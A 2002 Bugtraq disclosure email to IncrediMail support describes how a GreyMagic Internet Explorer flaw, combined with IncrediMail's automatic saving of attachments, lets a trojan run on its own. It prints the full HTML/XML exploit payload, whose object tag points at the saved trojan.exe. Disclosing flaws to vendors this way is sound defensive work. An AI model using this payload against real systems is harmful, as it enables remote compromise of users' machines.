Date: Fri, 15 Mar 2002 18:33:21 +0100
From: Eric Detoisien <eric.detoisien@global-secure.fr>
To: support@incredimail.com
Subject: MSIE vulnerability exploitable with IncrediMail
Cc: bugtraq@securityfocus.com
Hi,
A Microsoft Internet Explorer vulnerability was found by GreyMagic
(http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
possible to gain a remote access on a computer.
Incredimail save automatically email attachements in this directory=20
(on Windows 2000 Professionnal) :
C:\Program =
Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\=
Message Store\Attachments
So if you send an html email with the GreyMagic vulnerability and a=20
trojan in attachments, it will be save in this directory.=20
The html mail contains this code :
<span datasrc=3D"#oExec" datafld=3D"exploit" =
dataformatas=3D"html"></span>
<xml id=3D"oExec">
<security>
<exploit>
<![CDATA[
<object id=3D"oFile" =
classid=3D"clsid:11111111-1111-1111-1111-111111111111" =
codebase=3D"C:/Program =
Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/=
Message Store/Attachments/trojan.exe"></object>
]]>
</exploit>
</security>
</xml> =09
So, the trojan is executed automatically.
Eric DETOISIEN
Consultant S=E9curit=E9
GLOBAL SECURE
Tel. : 01-44-70-48-02
Fax. : 01-44-70-48-49=20
Web : http://www.global-secure.fr
